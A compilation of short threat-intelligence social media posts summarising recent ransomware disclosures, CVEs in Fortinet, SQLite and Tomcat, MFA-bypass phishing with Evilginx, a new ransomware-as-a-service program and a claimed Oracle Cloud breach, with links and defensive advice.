Healthcare provider DaVita Inc have filed an 8-K with the SEC for an ongoing ransomware incident.

https://www.sec.gov/Archives/edgar/data/927066/000119312525079593/d948299d8k.htm

Sensata Technologies Holding plc filed an 8-K with the SEC for a ransomware attack which is remarkably honest, and pretty much the textbook example of how to do it well. https://www.sec.gov/ix?doc=/Archives/edgar/data/1477294/000147729425000047/st-20250406.htm

We recently sat down with our Director of #ThreatIntel to talk about her role at Quad9 and what she enjoys about her work.

https://www.quad9.net/news/blog/staff-highlight-emilia-cebrat-maslowski

Oh is it time for another Fortinet crit again? Unauthenticated admin password change in FortiSwitch.

CVE-2024-48887, CVSSv3 9.3

https://fortiguard.fortinet.com/psirt/FG-IR-24-435

CVE-2025-29087 - Sqlite Integer Overflow Through Concat Function April 07, 2025 at 08:15PM https://ift.tt/5ylMfts #CVE #IOC #CTI #ThreatIntelligence #ThreatIntel #Cybersecurity #Recon

LFTD Partners Inc. filed an 8K with the SEC for a cyber incident.

They purchased $350k in cryptocurrency.. and immediately had it stolen.

“On April 1, 2025, the Company converted $350,000 of its cash into USD Coin (USDC), a digital stablecoin pegged to the U.S. dollar. Shortly thereafter, the digital wallet containing the USDC was compromised by an unauthorized and unknown third party, resulting in the theft of the full amount.”

https://www.sec.gov/ix?doc=/Archives/edgar/data/1391135/000109690625000425/lsfp-20250401.htm

Security researchers reveal hackers abusing #WordPress MU-plugins to hide malicious code

MU-plugins run on every page, which is a good target for attackers. Researchers discovered three types of code used by attackers: redirect to malicious site, backdoor, and hijack content and links.

Administrators are advised to remove unused plugins, update plugins as they are released, and protect high-privilege accounts with strong passwords and MFA

#cybersecurity #threatintel

https://www.bleepingcomputer.com/news/security/hackers-abuse-wordpress-mu-plugins-to-hide-malicious-code/

Following up on the scanning and password spraying that @hrbrmstr and @greynoise have posted about today, I combined a list of IPs I'm seeing going after Palo Alto GlobalProtect with the Greynoise lists:

https://cascadiacrow.com/globalprotectips.txt

I also have a list of usernames attempted by those various IP addresses:

https://cascadiacrow.com/globalprotectusernames.txt

(recordedfuture.com) Apache Tomcat: Critical Path Equivalence Vulnerability (CVE-2025-24813) Under Active Exploitation https://www.recordedfuture.com/blog/apache-tomcat-cve-2025-24813-vulnerability-analysis

According to Recorded Future the Apache Tomcat vulnerability is now under active exploitation.

Summary:
This article details CVE-2025-24813, a critical path equivalence vulnerability in Apache Tomcat that allows unauthenticated remote code execution under specific conditions. The vulnerability affects multiple Tomcat versions (11.0.0-M1 to 11.0.2, 10.1.0-M1 to 10.1.34, 9.0.0-M1 to 9.0.98, and most 8.5.x versions). Greynoise has identified six malicious IP addresses attempting to exploit this vulnerability, targeting systems in the US, Japan, Mexico, South Korea, and Australia. Multiple proof-of-concept exploits have been published, increasing the risk of exploitation. Organizations are advised to upgrade to patched versions (11.0.3, 10.1.35, or 9.0.99) or implement network-level controls if immediate patching isn't possible.

(sophos.com) Evilginx: How Attackers Bypass MFA Through Adversary-in-the-Middle Attacks https://news.sophos.com/en-us/2025/03/28/stealing-user-credentials-with-evilginx/

A short descriptive article about Evilginx and how stealing credentials work, a few suggested ways of detecting etc.

Summary:
This article examines Evilginx, a tool that leverages the legitimate nginx web server to conduct Adversary-in-the-Middle (AitM) attacks that can bypass multifactor authentication (MFA). The tool works by proxying web traffic through malicious sites that mimic legitimate services like Microsoft 365, capturing not only usernames and passwords but also session tokens. The article demonstrates how Evilginx operates, showing how attackers can gain full access to a user's account even when protected by MFA. It provides detection methods through Azure/Microsoft 365 logs and suggests both preemptive and reactive mitigations, emphasizing the need to move toward phishing-resistant FIDO2-based authentication methods.

So this is what I was dancing about last night - DomainTools Investigations researchers uncovered nearly 900 connected domains spoofing defense and aerospace firms involved in the Ukraine conflict.

#infosec #cybersecurity #threatintel

https://dti.domaintools.com/phishing-campaign-targets-defense-and-aerospace-firms-linked-to-ukraine-conflict/?utm_source=Mastodon&utm_medium=Social&utm_campaign=PhishingInfra-UAConflict

Fine that H-ISAC is publishing this out of "an abundance of caution," but the originating account looks like total crap. I do not think ISIS-K is planning car bombings of hospitals, nor has any evidence been presented that they are.

#ThreatIntel #ThreatIntelligence

https://dd80b675424c132b90b3-e48385e382d2e5d17821a5e1d8e4c86b.ssl.cf1.rackcdn.com/external/tlpwhite-aa319249-potential-terror-threat-targeted-at-health-sector-aha-health-isac-joint-threa.pdf

(checkpoint.com) VanHelsingRaaS: Analysis of a New and Rapidly Expanding Ransomware-as-a-Service Program

https://research.checkpoint.com/2025/vanhelsing-new-raas-in-town/

Last week Cyfirma released a short article and "analysis" about the VanHelsing RaaS and here comes a bit meatier one from CheckPoint.

VanHelsingRaaS is a new ransomware-as-a-service program launched on March 7, 2025, that has quickly gained traction in the cybercrime world. Within just two weeks of its introduction, it infected three victims and demanded large ransom payments. The service offers free access to reputable affiliates while new affiliates must pay a $5,000 deposit. Affiliates receive 80% of ransom payments, with 20% going to the RaaS operators. The ransomware targets multiple platforms including Windows, Linux, BSD, ARM, and ESXi systems, significantly expanding its attack surface. The program follows typical Russian cybercrime behavior by prohibiting encryption of systems in CIS countries.

Whoa, check this out! Head Mare and Twelve are teaming up! Two threat groups joining forces... sounds like things are about to get real.

And guess what? The WinRAR exploit (CVE-2023-38831) and Exchange (ProxyLogon) are *still* being used. Seriously, folks, patch your systems! Phishing and supply chain attacks are still a major problem too.

This reminds me of a pentest where we almost missed the forest for the trees. You know, sometimes it's the simple stuff that makes all the difference.

So, what's the takeaway here? Patch everything, harden your systems, train your employees, and audit those supply chains! Oh, and network segmentation? It's worth its weight in gold! Don't overlook it!

I'm curious, what's the craziest security blunder you've ever witnessed firsthand? Spill the beans!

Somebody is claiming to have exfiltrated 6 million lines of data with Oracle Cloud’s SSO and LDAP that includes JKS files, encrypted SSO passwords, key files and enterprise manager JPS keys from servers on login.*.oraclecloud.com

The poster has no prior reputation, it is unclear if they're LARPing. Some of the sample data does align with prior infostealer logs, I'm told. https://breachforums.st/Thread-SELLING-Oracle-cloud-traditional-hacked-login-X-oraclecloud-com

Blacklock ransomware group aka El Dorado aka Dragon Force appear to have been hacked. Or should I say free pentest. #threatintel